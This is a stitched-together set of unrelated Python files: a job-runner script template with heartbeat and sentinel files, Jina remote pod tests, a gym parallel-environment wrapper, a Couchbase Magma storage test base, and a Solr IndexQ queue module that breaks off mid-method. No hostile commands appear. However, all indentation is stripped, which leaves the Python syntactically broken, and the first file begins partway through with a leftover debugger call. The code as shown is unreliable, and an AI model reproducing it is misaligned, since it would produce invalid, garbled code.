python_template = r"""#!%(lang_exe)s
import threading, time, os, sys
cmd='%(cmd)s'
sentinel_fn='%(sentinel_fn)s'
heartbeat_fn='%(heartbeat_fn)s'
sleep_s=%(sleep_s)s
cwd='%(cwd)s'
os.chdir(cwd)
def log(msg):
sys.stderr.write(msg)
sys.stderr.write('\n')
#sys.stdout.flush()
def thread_heartbeat():
ofs = open(heartbeat_fn, 'w')
pid = os.getpid()
pgid = os.getpgid(0)
x = 0
while True:
ofs.write('{} {} {}\n'.format(x, pid, pgid))
ofs.flush()
time.sleep(sleep_s)
x += 1
def start_heartbeat():
hb = threading.Thread(target=thread_heartbeat)
log('alive? {}'.format(hb.is_alive()))
hb.daemon = True
hb.start()
return hb
def main():
log('cwd:{!r}'.format(os.getcwd()))
if os.path.exists(sentinel_fn):
os.remove(sentinel_fn)
if os.path.exists(heartbeat_fn):
os.remove(heartbeat_fn)
os.system('touch {}'.format(heartbeat_fn))
log("before: pid={}s pgid={}s".format(os.getpid(), os.getpgid(0)))
try:
os.setpgid(0, 0)
except OSError as e:
log('Unable to set pgid. Possibly a grid job? Hopefully there will be no dangling processes when killed: {}'.format(
repr(e)))
log("after: pid={}s pgid={}s".format(os.getpid(), os.getpgid(0)))
hb = start_heartbeat()
log('alive? {} pid={} pgid={}'.format(hb.is_alive(), os.getpid(), os.getpgid(0)))
rc = os.system(cmd)
# Do not delete the heartbeat here. The discoverer of the sentinel will do that,
# to avoid a race condition.
#if os.path.exists(heartbeat_fn):
# os.remove(heartbeat_fn)
with open(sentinel_fn, 'w') as ofs:
ofs.write(str(rc))
# sys.exit(rc) # No-one would see this anyway.
if rc:
raise Exception('{} <- {!r}'.format(rc, cmd))
main()
"""
if __name__ == "__main__":
import pdb
pdb.set_trace()
main(*sys.argv) # pylint: disable=no-value-for-parameter
|
test_remote2.py
|
import os
import threading
import time
import unittest
from multiprocessing import Process
from jina.logging import get_logger
from jina.main.parser import set_gateway_parser, set_pea_parser, set_pod_parser
from jina.peapods.pod import GatewayPod, BasePod
from jina.peapods.remote import RemotePea, PodSpawnHelper, PeaSpawnHelper, MutablePodSpawnHelper, RemotePod, \
RemoteMutablePod
from tests import JinaTestCase
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
class MyTestCase(JinaTestCase):
def test_logging_thread(self):
_event = threading.Event()
logger = get_logger('mytest', event_trigger=_event)
def _print_messages():
while True:
_event.wait()
print(f'thread: {_event.record}')
print(type(_event.record))
_event.clear()
t = threading.Thread(target=_print_messages)
t.daemon = True
t.start()
logger.info('blah, blah')
logger.info('blah, blah, blah')
time.sleep(.1)
logger.warning('warn, warn, warn')
time.sleep(.1)
logger.debug('warn, warn, warn')
time.sleep(.1)
logger.success('crit')
time.sleep(.1)
def test_remote_pod(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3',
'--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
PodSpawnHelper(p_args).start()
t.join()
def test_remote_pod_process(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3',
'--port-grpc', str(f_args.port_grpc), '--runtime', 'process'])
def start_spawn():
PodSpawnHelper(p_args).start()
with GatewayPod(f_args):
t = Process(target=start_spawn)
t.daemon = True
t.start()
time.sleep(5)
def test_remote_two_pea(self):
# NOTE: right now there is no way to spawn two peas with one gateway!!!
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
def start_client(d):
print('im running %d' % d)
p_args = set_pea_parser().parse_args(
['--host', 'localhost', '--name', 'testpea%d' % d, '--port-grpc', str(f_args.port_grpc)])
PeaSpawnHelper(p_args).start()
t = Process(target=start_gateway)
t.daemon = True
t.start()
time.sleep(1)
c1 = Process(target=start_client, args=(1,))
c2 = Process(target=start_client, args=(2,))
c1.daemon = True
c2.daemon = True
c1.start()
c2.start()
time.sleep(5)
c1.join()
c2.join()
def tearDown(self) -> None:
time.sleep(2)
super().tearDown()
def test_customized_pod(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3', '--port-grpc', str(f_args.port_grpc)])
p = BasePod(p_args)
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
MutablePodSpawnHelper(p.peas_args).start()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_customized_pod2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pod_parser().parse_args(
['--host', 'localhost', '--replicas', '3', '--port-grpc', str(f_args.port_grpc)])
p = BasePod(p_args)
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemoteMutablePod(p.peas_args):
pass
t.join()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_remote_pea2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemotePea(p_args):
pass
t.join()
@unittest.skipIf('GITHUB_WORKFLOW' in os.environ, 'skip the network test on github workflow')
def test_remote_pod2(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
with RemotePod(p_args):
pass
t.join()
def test_remote_pea(self):
f_args = set_gateway_parser().parse_args(['--allow-spawn'])
p_args = set_pea_parser().parse_args(['--host', 'localhost', '--port-grpc', str(f_args.port_grpc)])
def start_gateway():
with GatewayPod(f_args):
time.sleep(5)
t = Process(target=start_gateway)
t.daemon = True
t.start()
time.sleep(1)
PeaSpawnHelper(p_args).start()
t.join()
if __name__ == '__main__':
unittest.main()
|
util_envs.py
|
import numpy as np
import multiprocessing as mp
import gym
def _child(id, pipe):
"""
Event loop run by the child processes
"""
env = gym.make(id)
try:
while True:
command = pipe.recv()
# command is a tuple like ("call" | "get", "name.of.attr", extra args...)
obj = env
attrs = command[1].split(".")
for attr in attrs[:-1]:
obj = getattr(obj, attr)
if command[0] == "call":
fct = getattr(obj, attrs[-1])
result = fct(*command[2])
elif command[0] == "get":
result = getattr(obj, attrs[-1])
elif command[0] == "hasattr":
result = hasattr(obj, attrs[-1])
pipe.send(result)
finally:
pipe.close()
class _ChildEnv:
"""
Wrapper for an env in a child process.
"""
def __init__(self, id):
self._pipe, child_pipe = mp.Pipe()
self._process = mp.Process(target=_child, args=(id, child_pipe))
self._process.start()
def call(self, method, *args):
self._pipe.send(("call", method, args))
def get(self, attr):
self._pipe.send(("get", attr))
def hasattr(self, attr):
self._pipe.send(("hasattr", attr))
def result(self):
return self._pipe.recv()
def call_sync(self, *args):
self.call(*args)
return self.result()
def get_sync(self, *args):
self.get(*args)
return self.result()
def hasattr_sync(self, *args):
self.hasattr(*args)
return self.result()
def close(self):
self._pipe.close()
self._process.join()
class ParallelBatchEnv(gym.Env):
""" Environment to run multiple games in parallel.
"""
def __init__(self, env_id, batch_size):
"""
Parameters
----------
env_id : list of str or str
Environment IDs that will compose a batch. If only
one env_id is provided, it will be repeated `batch_size` times.
batch_size : int
Number of environment to run in parallel.
"""
self.env_ids = env_id if type(env_id) is list else [env_id] * batch_size
self.batch_size = batch_size
assert len(self.env_ids) == self.batch_size
self.envs = []
for id in self.env_ids:
self.envs.append(_ChildEnv(id))
self.observation_space = self.envs[0].get_sync("observation_space")
self.action_space = self.envs[0].get_sync("action_space")
def skip(self, ngames=1):
for env in self.envs:
env.call_sync("unwrapped.skip", ngames)
def seed(self, seed=None):
# Use different seed for each env to decorrelate
# the examples in the batch.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.call_sync("seed", seed)
return seeds
def reset(self):
self.last = [None] * self.batch_size
obs, infos = [], []
for env in self.envs:
env.call("reset")
for env in self.envs:
result = env.result()
ob, info = result
obs.append(ob)
infos.append(info)
return obs, infos
def step(self, actions):
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game is done
results.append(self.last[i]) # Copy last infos over.
else:
env.call("step", action)
results.append(None)
obs, rewards, dones, infos = [], [], [], []
for i, (env, result) in enumerate(zip(self.envs, results)):
if result is None:
result = env.result()
ob, reward, done, info = result
obs.append(ob)
rewards.append(reward)
dones.append(done)
infos.append(info)
self.last[i] = result
return obs, rewards, dones, infos
def render(self, mode='human'):
for env in self.envs:
env.call("render", mode)
renderings = []
for env in self.envs:
renderings.append(env.result())
return renderings
def close(self):
for env in self.envs:
env.close()
class BatchEnv(gym.Env):
""" Environment to run multiple games independently.
"""
def __init__(self, env_id, batch_size):
"""
Parameters
----------
env_id : list of str or str
Environment IDs that will compose a batch. If only
one env_id is provided, it will be repeated `batch_size` times.
batch_size : int
Number of independent environments to run.
"""
self.env_ids = env_id if type(env_id) is list else [env_id] * batch_size
self.batch_size = batch_size
assert len(self.env_ids) == self.batch_size
self.envs = [gym.make(self.env_ids[i]) for i in range(self.batch_size)]
self.observation_space = self.envs[0].observation_space
self.action_space = self.envs[0].action_space
def skip(self, ngames=1):
for env in self.envs:
env.env.skip(ngames)
def seed(self, seed=None):
# Use different seed for each env to decorrelate
# the examples in the batch.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.seed(seed)
return seeds
def reset(self):
self.last = [None] * self.batch_size
obs, infos = [], []
for env in self.envs:
ob, info = env.reset()
obs.append(ob)
infos.append(info)
return obs, infos
def step(self, actions):
obs, rewards, dones, infos = [], [], [], []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game is done
ob, reward, done, info = self.last[i] # Copy last infos over.
else:
ob, reward, done, info = env.step(action)
obs.append(ob)
rewards.append(reward)
dones.append(done)
infos.append(info)
self.last[i] = ob, reward, done, info
return obs, rewards, dones, infos
def render(self, mode='human'):
renderings = []
for env in self.envs:
rendering = env.render(mode=mode)
renderings.append(rendering)
return renderings
def close(self):
for env in self.envs:
env.close()
|
magma_base.py
|
import math
import os
import random
import time
import threading
from Cb_constants.CBServer import CbServer
from cb_tools.cbstats import Cbstats
from remote.remote_util import RemoteMachineShellConnection
from storage.storage_base import StorageBase
from storage_utils.magma_utils import MagmaUtils
class MagmaBaseTest(StorageBase):
def setUp(self):
super(MagmaBaseTest, self).setUp()
# Update Magma/Storage Properties
props = "magma"
update_bucket_props = False
self.disable_magma_commit_points = self.input.param(
"disable_magma_commit_points", False)
self.max_commit_points = self.input.param("max_commit_points", None)
if self.disable_magma_commit_points:
self.max_commit_points = 0
if self.max_commit_points is not None:
props += ";magma_max_checkpoints={}".format(self.max_commit_points)
self.log.debug("props== {}".format(props))
update_bucket_props = True
if update_bucket_props:
self.bucket_util.update_bucket_props(
"backend", props,
self.cluster, self.cluster.buckets)
self.magma_utils = MagmaUtils()
# Monitor Stats Params
self.ep_queue_stats = self.input.param("ep_queue_stats", True)
self.monitor_stats = ["doc_ops", "ep_queue_size"]
if not self.ep_queue_stats:
self.monitor_stats = ["doc_ops"]
# Disk usage before data load
self.empty_bucket_disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)[0]
self.log.info("Empty magma bucket disk usage: {}".format(
self.empty_bucket_disk_usage))
# self.thread_count is used to define number of thread use
# to read same number of documents parallelly
self.read_thread_count = self.input.param("read_thread_count", 4)
self.disk_usage = dict()
# Creating clients in SDK client pool
self.sdk_timeout = self.input.param("sdk_timeout", 60)
self.init_sdk_pool_object()
self.log.info("Creating SDK clients for client_pool")
max_clients = min(self.task_manager.number_of_threads, 20)
clients_per_bucket = int(math.ceil(max_clients / self.standard_buckets))
for bucket in self.cluster.buckets:
self.sdk_client_pool.create_clients(
bucket, [self.cluster.master],
clients_per_bucket,
compression_settings=self.sdk_compression)
# Initial Data Load
self.loader_dict = None
self.init_loading = self.input.param("init_loading", True)
if self.init_loading:
if self.active_resident_threshold < 100:
self.check_temporary_failure_exception = True
self.create_start = 0
self.create_end = self.init_items_per_collection
self.generate_docs(doc_ops="create")
self.load_buckets_in_dgm(self.gen_create, "create", 0)
else:
self.initial_load()
self.dgm_prcnt = self.get_bucket_dgm(self.buckets[0])
self.log.info("DGM percentage after init loading is {}".format(self.dgm_prcnt))
if self.standard_buckets == 1 or self.standard_buckets == self.magma_buckets:
for bucket in self.bucket_util.get_all_buckets(self.cluster):
disk_usage = self.get_disk_usage(
bucket, self.cluster.nodes_in_cluster)
self.disk_usage[bucket.name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial creation is {}MB\
".format(bucket.name,
self.disk_usage[bucket.name]))
self.log.info("==========Finished magma base setup========")
def tearDown(self):
super(MagmaBaseTest, self).tearDown()
def compute_docs_ranges(self, start=None, doc_ops=None):
self.multiplier = self.input.param("multiplier", 1)
doc_ops = doc_ops or self.doc_ops
ops_len = len(doc_ops.split(":"))
if "read" in doc_ops:
self.read_start = 0
self.read_end = self.init_items_per_collection
if ops_len > 1:
ops_len -= 1
if "create" in doc_ops:
ops_len -= 1
self.create_start = start or self.init_items_per_collection
if start:
self.create_end = start + start * self.multiplier
else:
self.create_end = self.init_items_per_collection + self.init_num_items * self.multiplier
self.num_items_per_collection += (self.create_end - self.create_start)
if ops_len == 1:
self.update_start = 0
self.update_end = self.init_num_items
self.expiry_start = 0
self.expiry_end = self.init_num_items * self.multiplier
self.delete_start = 0
self.delete_end = self.init_num_items
elif ops_len == 2:
self.update_start = 0
self.update_end = self.init_num_items // 2
self.delete_start = self.init_num_items // 2
self.delete_end = self.init_num_items
if "expiry" in doc_ops:
self.delete_start = 0
self.delete_end = self.init_num_items // 2
self.expiry_start = self.init_num_items // 2
self.expiry_end = self.init_num_items * self.multiplier
elif ops_len == 3:
self.update_start = 0
self.update_end = self.init_num_items // 3
self.delete_start = self.init_num_items // 3
self.delete_end = (2 * self.init_num_items) // 3
self.expiry_start = (2 * self.init_num_items) // 3
self.expiry_end = self.init_num_items * self.multiplier
self.read_start = self.update_start
self.read_end = self.update_end
if "delete" in doc_ops:
self.num_items_per_collection -= (self.delete_end - self.delete_start)
if "expiry" in doc_ops:
self.num_items_per_collection -= (self.expiry_end - self.expiry_start)
def validate_seq_itr(self):
if self.dcp_services and self.num_collections == 1:
index_build_q = "SELECT state FROM system:indexes WHERE name='{}';"
start = time.time()
result = False
while start + 300 > time.time():
result = self.query_client.query_tool(
index_build_q.format(self.initial_idx), timeout=60)
if result["results"][0]["state"] == "online":
result = True
break
self.sleep(5)
self.assertTrue(result, "initial_idx Index warmup failed")
self.final_idx = "final_idx"
self.final_idx_q = "CREATE INDEX %s on default:`%s`.`%s`.`%s`(body) with \
{\"defer_build\": false};" % (self.final_idx,
self.buckets[0].name,
CbServer.default_scope,
self.collections[0])
result = self.query_client.query_tool(self.final_idx_q, timeout=3600)
start = time.time()
if result["status"] != "success":
while start + 300 > time.time():
result = self.query_client.query_tool(
index_build_q.format(self.final_idx), timeout=60)
if result["results"][0]["state"] == "online":
result = True
break
self.sleep(5)
self.assertTrue(result, "final_idx Index warmup failed")
else:
self.assertTrue(result["status"] == "success", "Index query failed!")
self.sleep(5)
self.initial_count_q = "Select count(*) as items "\
"from default:`{}`.`{}`.`{}` where meta().id like '%%';".format(
self.buckets[0].name, CbServer.default_scope, self.collections[0])
self.final_count_q = "Select count(*) as items "\
"from default:`{}`.`{}`.`{}` where body like '%%';".format(
self.buckets[0].name, CbServer.default_scope, self.collections[0])
self.log.info(self.initial_count_q)
self.log.info(self.final_count_q)
initial_count, final_count = 0, 0
kv_items = self.bucket_util.get_bucket_current_item_count(
self.cluster, self.buckets[0])
start = time.time()
while start + 300 > time.time():
kv_items = self.bucket_util.get_bucket_current_item_count(
self.cluster, self.buckets[0])
self.log.info("Items in KV: %s" % kv_items)
initial_count = self.query_client.query_tool(
self.initial_count_q)["results"][0]["items"]
self.log.info("## Initial Index item count in %s:%s:%s == %s"
% (self.buckets[0].name,
CbServer.default_scope, self.collections[0],
initial_count))
final_count = self.query_client.query_tool(self.final_count_q)["results"][0]["items"]
self.log.info("## Final Index item count in %s:%s:%s == %s"
% (self.buckets[0].name,
CbServer.default_scope, self.collections[0],
final_count))
if initial_count != kv_items or final_count != kv_items:
self.sleep(5)
continue
break
# self.assertTrue(initial_count == kv_items,
# "Indexer failed. KV:{}, Initial:{}".
# format(kv_items, initial_count))
# self.assertTrue(final_count == kv_items,
# "Indexer failed. KV:{}, Final:{}".
# format(kv_items, final_count))
def get_magma_stats(self, bucket, servers=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
servers = servers or self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
result = dict()
shell = RemoteMachineShellConnection(server)
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
shell.disconnect()
magma_stats_for_all_servers[server.ip] = result
return magma_stats_for_all_servers
def get_disk_usage(self, bucket, servers=None):
return self.magma_utils.get_disk_usage(self.cluster, bucket,
self.data_path, servers)
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
time_end = time.time() + 60 * 5
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
while time.time() < time_end:
stats = list()
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
if not self.windows_platform:
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
else:
output = shell.execute_command(
"cat /proc/cpuinfo | grep 'processor' | tail -1 | awk '{print $3}'"
)[0][0].split('\n')[0]
output = str(int(output) + 1)
self.log.debug("%s - core(s): %s" % (server.ip, output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(
bucket, [server],
field_to_grep=grep_field)
fragmentation_values.append(
float(_res[server.ip][grep_field][
"Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
res = list()
for value in result.values():
res.append(max(value))
if (max(res)) <= 1.1 * (float(self.fragmentation)/100):
self.log.info("magma stats fragmentation result %s" % result)
self.log.debug(stats)
return True
self.log.info("magma stats fragmentation result %s" % result)
self.log.info("Fragmentation value that exceeds the configured value is ==> {}".format(max(res)))
self.log.info(stats)
return False
def get_fragmentation_upsert_docs_list(self):
"""
This function gives the list of "number of docs" need
to be updated to touch the given fragmentation value
"""
update_doc_count = int(math.ceil(float(
self.fragmentation * self.num_items) / (
100 - self.fragmentation)))
upsert_doc_list = list()
while update_doc_count > self.num_items:
upsert_doc_list.append(self.num_items)
update_doc_count -= self.num_items
if update_doc_count > 0:
upsert_doc_list.append(update_doc_count)
self.log.info("Upsert list {}".format(upsert_doc_list))
return upsert_doc_list
def get_state_files(self, bucket, server=None):
if server is None:
server = self.cluster.master
shell = RemoteMachineShellConnection(server)
magma_path = os.path.join(self.data_path,
bucket.name, "magma.0")
kv_path = shell.execute_command("ls %s | grep kv | head -1" %
magma_path)[0][0].split('\n')[0]
path = os.path.join(magma_path, kv_path, "rev*/seqIndex")
self.log.debug("SeqIndex path = {}".format(path))
output = shell.execute_command("ls %s | grep state" % path)[0]
self.log.debug("State files = {}".format(output))
shell.disconnect()
return output
def get_random_keyIndex(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name keyIndex".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_random_seqIndex(self):
shell = RemoteMachineShellConnection(self.cluster.master)
seqIndex, _ = shell.execute_command("find {} -name seqIndex".format(self.data_path))
shell.disconnect()
return random.choice(seqIndex)
def get_random_wal(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name wal".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_random_kvstore(self):
shell = RemoteMachineShellConnection(self.cluster.master)
keyIndex, _ = shell.execute_command("find {} -name kvstore-*".format(self.data_path))
shell.disconnect()
return random.choice(keyIndex)
def get_tombstone_count_key(self, servers=[]):
total_tombstones = {'final_count' : 0}
ts_per_node = dict()
for server in servers:
ts_per_node[server.ip] = 0
threads = []
lock = threading.Lock()
def count_tombstones(node, lock):
result = 0
result_str = ""
bucket = self.cluster.buckets[0]
magma_path = os.path.join(self.data_path, bucket.name, "magma.{}")
shell = RemoteMachineShellConnection(node)
shards = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(node.ip, shards))
for shard in range(min(int(shards), 64)):
magma = magma_path.format(shard)
kvstores, _ = shell.execute_command("ls {} | grep kvstore".format(magma))
cmd = '/opt/couchbase/bin/magma_dump {}'.format(magma)
for kvstore in kvstores:
dump = cmd
kvstore_num = kvstore.split("-")[1].strip()
dump += ' --kvstore {} --tree key --treedata | grep Key |grep \'"deleted":true\' | wc -l'.format(kvstore_num)
ts_count = shell.execute_command(dump)[0][0].strip()
self.log.debug("kvstore_num=={}, ts_count=={}".format(kvstore_num, ts_count))
result_str += str(ts_count) + "+"
result += int(ts_count)
self.log.info("node={} and result={}".format(node, result))
lock.acquire()
increment_result(result)
lock.release()
ts_per_node[node.ip] = result
def increment_result(result):
total_tombstones['final_count'] += result
for server in servers:
th = threading.Thread(
target=count_tombstones, args=[server, lock])
th.start()
threads.append(th)
for th in threads:
th.join()
self.log.info("total_tombstones {}".format(total_tombstones['final_count']))
self.log.info(" TombStones per node {}".format(ts_per_node))
return total_tombstones['final_count']
def get_tombstone_count_seq(self, server=None, shard=0, kvstore=0):
cmd = '/opt/couchbase/bin/magma_dump /data/kv/default/magma.{}/ \
--kvstore {} --tree key --treedata | grep Seq| wc -l'.format(shard,
kvstore)
shell = RemoteMachineShellConnection(server)
result = shell.execute_command(cmd)[0]
return result
def get_level_data_range(self, server=None, tree="key", shard=0, kvstore=0):
cmd = '/opt/couchbase/bin/magma_dump /data/kv/default/magma.{}/ \
--kvstore {} --tree {}'.format(shard, kvstore, tree)
shell = RemoteMachineShellConnection(server)
result = shell.execute_command(cmd)[0]
return result
|
indexq.py
|
import datetime
import logging
import sys
import os
import gzip
import shutil
import random
import json
import threading
import time
from multiprocessing.pool import ThreadPool
from multiprocessing import Process, JoinableQueue
from functools import partial
from SolrClient.exceptions import *
class IndexQ():
'''
IndexQ sub module will help with indexing content into Solr. It can be used to de-couple data processing from indexing.
Each queue is set up with the following directory structure
queue_name/
- todo/
- done/
Items get saved to the todo directory and once an item is processed it gets moved to the done directory. Items are processed in chronological order.
'''
def __init__(self, basepath, queue, compress=False, compress_complete=False, size=0, devel=False,
threshold=0.90, log=None, rotate_complete=None, **kwargs ):
'''
:param string basepath: Path to the root of the indexQ. All other queues will get created underneath this.
:param string queue: Name of the queue.
:param log: Logging instance that you want it to log to.
:param rotate_complete: Supply a callable that will be used to store completed files. Completed files will be moved to /done/`callable_output`/.
:param bool compress: If todo files should be compressed, set to True if there is going to be a lot of data and these files will be sitting there for a while.
:param bool compress: If done files should be compressed, set to True if there is going to be a lot of data and these files will be sitting there for a while.
:param int size: Internal buffer size (MB) that queued data must be to get written to the file system. If not passed, the data will be written to the filesystem as it is sent to IndexQ, otherwise they will be written when the buffer reaches 90%.
Example Usage::
i = IndexQ('/data/indexq','parsed_data')
'''
self.logger = log or logging.getLogger(__package__)
self._basepath = basepath
self._queue_name = queue
self._compress = compress
self._compress_complete = compress_complete
self._size = size
self._devel = devel
self._threshold = threshold
self._qpathdir = os.path.join(self._basepath, self._queue_name)
self._todo_dir = os.path.join(self._basepath, self._queue_name, 'todo')
self._done_dir = os.path.join(self._basepath, self._queue_name, 'done')
self._locked = False
self._rlock = threading.RLock()
self.rotate_complete = rotate_complete
#Lock File
self._lck = os.path.join(self._qpathdir,'index.lock')
for dir in [self._qpathdir, self._todo_dir, self._done_dir]:
if not os.path.isdir(dir):
os.makedirs(dir)
#First argument will be datestamp, second is counter
self._output_filename_pattern = self._queue_name+"_{}.json"
self._preprocess = self._buffer(self._size*1000000, self._write_file)
self.logger.info("Opening Queue {}".format(queue))
def _gen_file_name(self):
'''
Generates a random file name based on self._output_filename_pattern for the output to do file.
'''
date = datetime.datetime.now()
dt = "{}-{}-{}-{}-{}-{}-{}".format(str(date.year),str(date.month),str(date.day),str(date.hour),str(date.minute),str(date.second),str(random.randint(0,10000)))
return self._output_filename_pattern.format(dt)
def add(self, item=None, finalize=False, callback=None):
'''
Takes a string, dictionary or list of items for adding to queue. To help troubleshoot it will output the updated buffer size, however when the content gets written it will output the file path of the new file. Generally this can be safely discarded.
:param <dict,list> item: Item to add to the queue. If dict will be converted directly to a list and then to json. List must be a list of dictionaries. If a string is submitted, it will be written out as-is immediately and not buffered.
:param bool finalize: If items are buffered internally, it will flush them to disk and return the file name.
:param callback: A callback function that will be called when the item gets written to disk. It will be passed one position argument, the file path of the file written. Note that errors from the callback method will not be re-raised here.
'''
if item:
if type(item) is list:
check = list(set([type(d) for d in item]))
if len(check) > 1 or dict not in check:
raise ValueError("More than one data type detected in item (list). Make sure they are all dicts of data going to Solr")
elif type(item) is dict:
item = [item]
elif type(item) is str:
return self._write_file(item)
else:
raise ValueError("Not the right data submitted. Make sure you are sending a dict or list of dicts")
with self._rlock:
res = self._preprocess(item, finalize, callback)
return res
def _write_file(self, content):
while True:
path = os.path.join(self._todo_dir,self._gen_file_name())
if self._compress:
path += '.gz'
if not os.path.isfile(path):
break
self.logger.info("Writing new file to {}".format(path))
if self._compress:
with gzip.open(path, 'wb') as f:
f.write(content.encode('utf-8'))
else:
with open(path,'w') as f:
f.write(content)
return path
def _buffer(self, size, callback):
_c = {
'size': 0,
'callback': callback,
'osize': size if size > 0 else 1,
'buf': []
}
self.logger.debug("Starting Buffering Queue with Size of {}".format(size))
def inner(item=None, finalize=False, listener=None):
#Listener is the external callback specific by the user. Need to change the names later a bit.
if item:
#Buffer Item
[_c['buf'].append(x) for x in item]
#Wish I didn't have to make a string of it over here sys.getsizeof wasn't providing accurate info either.
_c['size'] += len(str(item))
if self._devel:
self.logger.debug("Item added to Buffer {} New Buffer Size is {}".format(self._queue_name, _c['size']))
if _c['size'] / _c['osize'] > self._threshold or (finalize is True and len(_c['buf']) >= 1):
#Write out the buffer
if self._devel:
if finalize:
self.logger.debug("Finalize is True, writing out")
else:
self.logger.debug("Buffer Filled, writing out")
res = _c['callback'](json.dumps(_c['buf'], indent=0, sort_keys=True))
if listener:
try:
listener(res)
except Exception as e:
self.logger.error("Problems in the Callback specified")
self.logger.exception(e)
if res:
_c['buf'] = []
_c['size'] = 0
return res
else:
raise RuntimeError("Couldn't write out the buffer." + _c)
return _c['size']
return inner
#This is about pullind data out
def _lock(self):
'''
Locks, or returns False if already locked
'''
if not self._is_locked():
with open(self._lck,'w') as fh:
if self._devel: self.logger.debug("Locking")
fh.write(str(os.getpid()))
return True
else:
return False
def _is_locked(self):
'''
Checks to see if we are already pulling items from the queue
'''
if os.path.isfile(self._lck):
try:
import psutil
except ImportError:
return True #Lock file exists and no psutil
#If psutil is imported
with open(self._lck) as f:
pid = f.read()
return True if psutil.pid_exists(int(pid)) else False
else:
return False
def _unlock(self):
'''
Unlocks the index
'''
if self._devel: self.logger.debug("Unlocking Index")
if self._is_locked():
os.remove(self._lck)
return True
else:
return True
def get_all_as_list(self, dir='_todo_dir'):
'''
Returns a list of the the full path to all items currently in the todo directory. The items will be listed in ascending order based on filesystem time.
This will re-scan the directory on each execution.
Do not use this to process items, this method should only be used for troubleshooting or something axillary. To process items use get_todo_items() iterator.
'''
dir = getattr(self,dir)
list = [x for x in os.listdir(dir) if x.endswith('.json') or x.endswith('.json.gz')]
full = [os.path.join(dir,x) for x in list]
full.sort(key=lambda x: os.path.getmtime(x))
return full
def get_todo_items(self, **kwargs):
'''
Returns an iterator that will provide each item in the todo queue. Note that to complete each item you have to run complete method with the output of this iterator.
That will move the item to the done directory and prevent it from being retrieved in the future.
'''
def inner(self):
for item in self.get_all_as_list():
yield item
self._unlock()
if not self._is_locked():
if self._lock():
return inner(self)
raise RuntimeError("RuntimeError: Index Already Locked")
def complete(self, filepath):
'''
Marks the item as complete by moving it to the done directory and optionally gzipping it.
'''
if not os.path.exists(filepath):
raise FileNotFoundError("Can't Complete {}, it doesn't exist".format(filepath))
if self._devel: self.logger.debug("Completing - {} ".format(filepath))
if self.rotate_complete:
try:
complete_dir = str(self.rotate_complete())
except Exception as e:
self.logger.error("rotate_complete function failed with the following exception.")
self.logger.exception(e)
raise
newdir = os.path.join(self._done_dir, complete_dir)
newpath = os.path.join(newdir, os.path.split(filepath)[-1] )
if not os.path.isdir(newdir):
self.logger.debug("Making new directory: {}".format(newdir))
os.makedirs(newdir)
else:
newpath = os.path.join(self._done_dir, os.path.split(filepath)[-1] )
try:
if self._compress_complete:
if not filepath.endswith('.gz'):
# Compressing complete, but existing file not compressed
# Compress and move it and kick out
newpath += '.gz'
self._compress_and_move(filepath, newpath)
return newpath
# else the file is already compressed and can just be moved
#if not compressing completed file, just move it
shutil.move(filepath, newpath)
self.logger.info(" Completed - {}".format(filepath))
